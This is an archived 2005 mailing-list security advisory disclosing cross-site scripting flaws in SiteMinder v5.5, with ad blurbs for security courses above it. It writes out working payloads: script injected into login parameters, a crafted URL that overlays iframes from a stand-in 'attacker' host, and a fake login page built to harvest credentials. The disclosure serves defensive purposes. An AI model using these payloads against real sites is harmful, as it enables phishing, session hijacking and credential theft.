Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Vuln-Dev
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

SiteMinder Multiple Vulnerabilities

from [c0ntexb] Network Security [Permanent Link]
Subject: SiteMinder Multiple Vulnerabilities
Date: 8 Jul 2005 14:03:11 -0000 
 /*
  
*****************************************************************************************************************
  $ An open security advisory #10 - Siteminder v5.5 Vulnerabilities
  
*****************************************************************************************************************
  1: Bug Researcher: c0ntex - c0ntexb[at]gmail.com
  2: Bug Released: July 08 2005
  3: Bug Impact Rate: Medium / Hi
  4: Bug Scope Rate: Remote
  
*****************************************************************************************************************
  $ This advisory and/or proof of concept code must not be used for commercial 
gain.
  
*****************************************************************************************************************

  Siteminder
  http://www3.ca.com/Solutions/Product.asp?ID=5262

  "eTrust? SiteMinder® is a market-leading, security and management foundation 
for enterprise Web
  applications with a centralized security infrastructure for managing user 
authentication and
  access. eTrust SiteMinder delivers the market?s most advanced security 
management capabilities
  and enterprise-class site administration, reducing overall IT operational 
cost and complexity.
  eTrust SiteMinder enables the secure delivery of essential information and 
applications to
  employees, partners, suppliers and customers, and scales with growing 
business needs.."

  Siteminder is vulnerable to XSS whereby a user can tag HTML or javascript on 
to various locations
  in a URL or input field and have the script run in the local users browser. 
This can be used to
  perform phishing attacks, hijack users browser sessions or user account 
information by redrawing
  the login page of a site.

  
http://vuln/siteminderagent/pwcgi/smpwservicescgi.exe?SMAUTHREASON=0&TARGET=&USERNAME=hacker&;
  
PASSWORD="><script>alert(document.cookie)</script>&BUFFER="><script>alert("Vulnerable")</script>

  The following link will abuse the URL option by first logging the user out of 
the site with a
  timeout error, due to the fact that we send her off to another HTTPS site, 
taking the user back to
  the login page. Next, we open an IFRAME over the original login fields with 
malicious Username and
  Password input fields, whereby a user will then supply their login details to 
a malicious site,
  to be later harvested and used in an attack.

  
http://site.com/siteminderagent/forms/login.fcc?TYPE=1&REALMOID=01-000000000-000000-0010-
  
0000-0000000000000&GUID=&SMAUTHREASON=32&TARGET=http://site.com/servlet/yum/eat/user.html";>
  <iframe bgcolor="white" src="https://attacker/snoop.html"; style="position: 
absolute; top:
  270px; left: 15 px;"></iframe><iframe src="https://attacker/snoop.html"; 
style="position:
  absolute; top: 270px; left: 15 px;"></iframe>

  To test if you are vulnerable to this issue, you can tag the following on to 
the end of a
  siteminder URL. If it is successful, you should see the Google homepage 
within an IFRAME.

  "><iframe bgcolor="white" src="http://www.google.com"; style="position: 
absolute; top: 270px;
  left: 15 px;"></iframe><iframe src="http://www.google.com"; style="position: 
absolute; top:
  270px; left: 15 px;"></iframe>


  /* snoop.html */
  <html>
    </head></head>
  <body>
    <form>
     User ID
      <input type="text" name="UserID">
     <br>
     Password:
      <input type="text" name="Password">
      <input type="submit" value="Submit">
    </form>
  </body>
  </html>


  I have contacted Netegrity via ca.com multiple times but received no 
response, as such, users
  should use a filtering technology like modsecurity to detect the above 
descibed attacks until
  a fix has been released.
[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
Previous by Date:  TSLSA-2005-0034 - multi, Trustix Security Advisor
Next by Date:  Fwd: [VOIPSEC] VoIP-Phones: Weakness in proccessing SIP-Notify-Messages, gary madsen
Previous by Thread:  TSLSA-2005-0034 - multi, Trustix Security Advisor
Next by Thread:  Re: SiteMinder Multiple Vulnerabilities, Tero Hänninen
Indexes:  [Date] [Thread] [Top] [All Lists]